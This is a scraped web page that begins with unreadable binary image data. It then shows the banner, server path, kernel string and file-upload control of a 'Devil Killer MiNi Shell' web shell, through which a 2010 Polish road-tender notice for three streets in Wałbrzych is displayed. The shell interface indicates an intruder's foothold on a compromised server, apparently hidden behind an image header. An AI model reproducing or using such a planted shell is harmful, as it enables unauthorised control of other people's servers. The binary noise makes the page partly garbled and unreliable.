JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100416/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100416/87367-N-2010.html

<p class="kh_header"><b>Wałbrzych: Wykonanie robót budowlanych dla zadania p.n. 
Modernizacja dróg gminnych prowadzących do zabytkowego Śródmieścia Wałbrzycha wraz z pozostałą infrastrukturą drogową - przebudowa ulic Sienkiewicza, Kościuszki, Moniuszki</b><br>
<b>Numer ogłoszenia: 87367 - 2010; data zamieszczenia: 16.04.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg i Komunikacji , ul. Armii Krajowej 35, 58-302 Wałbrzych, woj. dolnośląskie, tel. 074 6414400, 6414408, faks (074) 6414404.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdik.walbrzych.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Inny: jednostka budżetowa Gminy Wałbrzych.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie robót budowlanych dla zadania p.n. 
Modernizacja dróg gminnych prowadzących do zabytkowego Śródmieścia Wałbrzycha wraz z pozostałą infrastrukturą drogową - przebudowa ulic Sienkiewicza, Kościuszki, Moniuszki.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiot niniejszego zamówienia obejmuje wykonanie robót budowlanych w ramach zadania inwestycyjnego pod nazwą: Modernizacja dróg gminnych prowadzących do zabytkowego Śródmieścia Wałbrzycha wraz z pozostałą infrastrukturą drogową - przebudowa ulic Sienkiewicza, Kościuszki, Moniuszki
Kontrakt prowadzony będzie według warunków kontraktowych FIDIC - Warunki Kontraktowe dla budowy dla robót inżynieryjno-budowlanych projektowanych przez zamawiającego -
- 4 wydanie angielsko-polskie niezmienione 2008 (tłumaczenie 1 wydania 1999) Stowarzyszenie Inżynierów Doradców i Rzeczoznawców SIDiR.
Wymienione w tytule drogi gminne przeznaczone do przebudowy zlokalizowane są
w miejscowości Wałbrzych (gmina Wałbrzych, powiat wałbrzyski w województwie Dolnośląskim). Obecny ciąg komunikacyjny spełnia funkcje:
	ciągu pieszego,
	dojazdu (głównie odcinki jednokierunkowe) do miejsc: użyteczności publicznej, mieszkalnych i obiektów usługowych.
Zabudowa wokół ww ulic to przede wszystkim zabudowa mieszkaniowa wielorodzinna
i usługowa. Ponadto w rejonie terenu objętego opracowaniem znajdują się obiekty, w których
prowadzona jest działalność gospodarcza.
W ramach projektu zagospodarowania terenu przewiduje się przebudowę:
a)	ulicy Kościuszki (nr 116560D) od ulicy Mickiewicza do Rynku jako drogę gminną jednokierunkową z obustronnym chodnikiem,
b)	ulicy Sienkiewicza (nr 116554D) od placu Magistrackiego do Rynku jako drogę gminną jednokierunkową z obustronnym chodnikiem,
c)	ulicy Moniuszki (nr 116550D) od Rynku do ul. Matejki jako drogę gminną jednokierunkową -dwukierunkową z obustronnym chodnikiem,
d)	skrzyżowania (włączenie) ulicy Moniuszki z ulicami Kościelną, Garbarską, Pankiewicza oraz Matejki,
e)	skrzyżowania (włączenie) ulicy Sienkiewicza z ulicą Aptekarską,
f)	skrzyżowania (włączenie) ulicy Kościuszki z ulicą Młynarską,
g)	włączenia ulicy Kościuszki do ulicy Mickiewicza,
h)	nawierzchni jezdni z uwzględnieniem ruchu kat. KR2,
i)	odwodnienia projektowanych elementów infrastruktury komunikacyjnej,
j)	przyłączy wskazanych w dokumentacji projektowej,
k)	sieci wodociągowej w ww ulicach,
l)	oświetlenia oraz przesunięcie istniejącego oświetlenia,
m)	sieci z powodu ewentualnych kolizji,
n)	kabli energetycznych i telekomunikacyjnych - zabezpieczenie ich rurami typu A 75/110 PS.
Projektowane zagospodarowanie terenu przewiduje wykonanie nowej nawierzchni utwardzonej dróg. Układ jezdni będzie miał charakter jednokierunkowego pasa drogowego o szerokości 3,5 m lub dwukierunkowego o szerokości 4,5 m z kostki kamiennej (15/17cm spoinowanej, odzyskanej
z rozbiórki przedmiotowych ulic, nie dopuszcza się zabrudzenia górnej powierzchni kostki)
z obustronnymi chodnikami z kostki kamiennej (nowej, także spoinowanej) 8/11cm i płyt kamiennych (nowe płyty 1m x 0.8m). Nawierzchnia obecnej drogi od chodnika zostanie oddzielona krawężnikami kamiennymi gr.15cm. Tam gdzie to możliwe przewiduje się odzyskanie materiałów kamiennych spod zalegających warstw asfaltu. Należy zastosować nowe materiały imitujące pierwotne nawierzchnie: kostki 8/11, obrzeża (6/8)x30 oraz krawężniki 15x30- wszystkie mat. kamienne (istniejące materiały zostaną przekazane Inwestorowi). Po obu (lub jednej - zgodnie
z dokumentacją projektową) stronach ulicy projektuje się cieki przykrawężnikowe z kostki kamiennej. Ponadto dokumentacja przewiduje wymianę istniejącej sieci wodociągowej, kanalizacji deszczowej- wraz z przyłączami, przebudowę oświetlenia ulic oraz usunięcie kolizji z istniejącymi sieciami.
Charakterystyczne parametry określające wielkość inwestycji:
	długość drogi (283+106+132): 521 mb
	powierzchnia jezdni: ~2200 m2
	powierzchnia chodników: ~2100m2
	powierzchnia miejsc parkingowych: ~600 m2
	długość sieci wodociągowej wraz z przyłączami: ~850 m
	długość sieci kanalizacji deszczowej wraz z przyłączami: ~980 m
	długość kabli oświetleniowych: ~350 m
	słupy oświetleniowe: 2 szt.
	oprawy na wysięgnikach: 10 szt.
Inwestycję podzielono na następujące Odcinki (w rozumieniu definicji występującej w klauzuli 1.1.5.6 Warunków Kontraktowych):
	Odcinek nr 1 - ul. Kościuszki
	Odcinek nr 2 - ul. Sienkiewicza
	Odcinek nr 3 - ul. Moniuszki
W zakresie prac na danym Odcinku znajduje się wykonanie kompletu robót przypisanych
do danego Odcinka (roboty drogowe, przebudowa sieci, oświetlenie, usunięcie kolizji, oznakowanie).
W zakresie obowiązków Wykonawcy znajduje się opracowanie Projektu organizacji ruchu
na czas prowadzenia robót łącznie z uzgodnieniami i zatwierdzeniem. Podstawowymi założeniami przy opracowywaniu projektu są:
minimalizowanie utrudnień w ruchu w otoczeniu prowadzonych prac,
nie dopuszcza się całkowitego zamknięcia dla ruchu pieszego obszaru objętego robotami budowlanymi,
należy założyć etapowe wyłączanie z ruchu poszczególnych fragmentów obszaru objętego robotami budowlanymi i po zakończeniu robót przywracanie na nich ruchu.
Wykonawca opracuje Projekty organizacji ruchu na czas prowadzenia robót łącznie 
z uzgodnieniami i zatwierdzeniem w terminie 28 dni od daty otrzymania wezwania na mocy klauzuli 8.1 Warunków kontraktu. 
W trakcie prowadzenia robót Wykonawca zobowiązuje się niezwłocznie do realizacji poleceń organu zarządzającego ruchem na drogach oraz sporządzania i uzgadniania aneksów do dokumentacji projektowej w zakresie organizacji ruchu zastępczego, według wniosków zgłaszanych przez Zamawiającego w trakcie prowadzenia budowy.
Wykonawca zapewni zespołowi Inżyniera pomieszczenie do organizacji rad budowy dla maksimum 20 osób oraz miejsca pracy biurowej (biurko + krzesło) w trakcie wizyt Inżyniera
i inspektorów nadzoru na budowie.
Wykonawca realizujący roboty w ramach zamówienia będzie musiał współpracować
z wykonawcami realizującymi roboty na rzecz:
	Polskie Górnictwo Naftowe i Gazownictwo S.A., 00-537 Warszawa, ul. Krucza 6/14, Gazownia Wałbrzych, 58-300 Wałbrzych, ul. Kościuszki 3 - demontaż sieci gazowniczej.
Dla zakresu prac finansowanego przez Wałbrzyskie Przedsiębiorstwo Wodociągów i Kanalizacji Sp. z o.o. (przebudowa wodociągu) Wykonawca dodatkowo zobowiązany jest do powiadamiania o odbiorach, uzyskania potwierdzenia odbioru oraz akceptacji obmiarów robót przez inspektora nadzoru z ramienia Wałbrzyskiego Przedsiębiorstwa Wodociągów i Kanalizacji Sp. z o.o..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>nie wiecej niz 50% wartości zamówienia podstawowego,polegajacego na powtórzeniu tego samego rodzaju zamówienia</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.20.00.00-9, 45.23.00.00-8, 45.23.30.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 10.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 80 000,00 PLN
słownie: osiemdziesiąt tysięcy złotych</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	wykonali (zakończyli) w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, roboty budowlane polegające na budowie/przebudowie/modernizacji  nawierzchni z kostki kamiennej lub nawierzchni z kostki kamiennej łączonej z płytami kamiennymi o łącznej powierzchni co najmniej 3500 m2 przy czym co najmniej dwie roboty miały powierzchnię nie mniejszą niż 1000 m2  każda.
Ocena czy wykonawca spełnia warunki udziału w postępowaniu, dokonana zostanie zgodnie z kryterium spełnia-nie spełnia na podstawie analizy załaczonych do oferty dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>dysponować lub mieć możliwość dysponowania następującymi osobami, które będą uczestniczyć w wykonaniu zamówienia :
a)	Przedstawiciel Wykonawcy:
- 	doświadczenie zawodowe w zarządzaniu Kontraktem prowadzonym zgodnie z Warunkami kontraktowymi FIDIC lub równoważnymi jako Przedstawiciel Wykonawcy, Kierownik Kontraktu, Kierownik Projektu, Zastępca Kierownik Kontraktu, Pełnomocnik ds. Realizacji Projektu itp. budowy/przebudowy/modernizacji co najmniej 1 drogi i o wartości robót budowlanych minimum 2 mln PLN (netto).
b)	Kierownik budowy w specjalności drogowej posiadający:
-	uprawnienia budowlane do kierowania robotami budowlanymi w specjalności drogowej bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
- 	minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót drogowych (liczone od daty uzyskania uprawnień budowlanych),
- 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu budowy/przebudowy/modernizacji co najmniej 1 inwestycji drogowej w zakresie której znajdowała się budowa/przebudowa/modernizacja nawierzchni z kostki kamiennej lub nawierzchni z kostki kamiennej łączonej z płytami kamiennymi o łącznej powierzchni co najmniej 1000 m2.
c)	Kierownik robót budowlanych w specjalności sanitarnej posiadający::
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane (wystarczający zakres w specjalności sieci wodociągowe, kanalizacyjne i gazowe), które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
-	minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót sieciowych kanalizacyjnych lub wodociągowych (liczone od daty uzyskania uprawnień budowlanych),
- 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu budowy/przebudowy/modernizacji co najmniej 1 inwestycji drogowej o całkowitej wartości robót budowlanych minimum 2 mln PLN (netto) w zakresie której znajdowała się budowa/przebudowa/modernizacja kanalizacji deszczowej i wodociągu.
d)	Kierownik robót budowlanych w specjalności elektrycznej posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności elektrycznej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
-	minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót sieciowych elektrycznych i elektroenergetycznych (liczone od daty uzyskania uprawnień budowlanych),
- 	doświadczenie w pełnieniu samodzielnych funkcji technicznych polegających na kierowaniu lub nadzorowaniu budowy/przebudowy/modernizacji, co najmniej 1 inwestycji w zakresie, której znajdowała się budowa/przebudowa/modernizacja oświetlenia drogi.
e)	Kierownik robót budowlanych w specjalności telekomunikacyjnej posiadający:
- uprawnienia budowlane do kierowania robotami budowlanymi w specjalności telekomunikacyjnej bez ograniczeń zgodnie z przepisami ustawy z dnia 7 lipca 1994 r. Prawo budowlane i Rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 r. w sprawie samodzielnych funkcji technicznych w budownictwie lub im odpowiadające ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów,
- 	aktualny wpis na listę członków właściwej izby samorządu zawodowego, zgodnie z przepisami ustawy z dnia 15 grudnia 2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz urbanistów oraz posiadający ubezpieczenie od odpowiedzialności cywilnej,
-	minimum 5 lat doświadczenia zawodowego w nadzorowaniu lub wykonawstwie robót telekomunikacyjnych (liczone od daty uzyskania uprawnień budowlanych).
Ocena czy wykonawca spełnia warunki udziału w postępowaniu, dokonana zostanie zgodnie z kryterium spełnia-nie spełnia na podstawie analizy załaczonych do oferty dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>a)	Posiadać średni roczny przychód netto ze sprzedaży w okresie ostatnich trzech lat obrotowych, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, co najmniej 3 000 000 PLN;
b)	Posiadać środki finansowe lub zdolność kredytową 
w wysokości, co najmniej 500 000 PLN;
c)	Posiadać ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia w wysokości, co najmniej 500 000 PLN;
Ocena czy wykonawca spełnia warunki udziału w postępowaniu, dokonana zostanie zgodnie z kryterium spełnia-nie spełnia na podstawie analizy załaczonych do oferty dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz robót budowlanych w zakresie niezbędnym do wykazania spełniania warunku  wiedzy i doświadczenia, wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że roboty zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

<li  style="margin-bottom: 12px;">sprawozdanie finansowe w całości, a jeżeli podlega ono badaniu przez biegłego rewidenta zgodnie z przepisami o rachunkowości również z opinią odpowiednio o badanym sprawozdaniu albo jego części, a w przypadku wykonawców niezobowiązanych do sporządzania sprawozdania finansowego inny dokument określający obroty oraz zobowiązania i należności - za okres nie dłuższy niż ostatnie 3 lata obrotowe</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualną informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy, wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
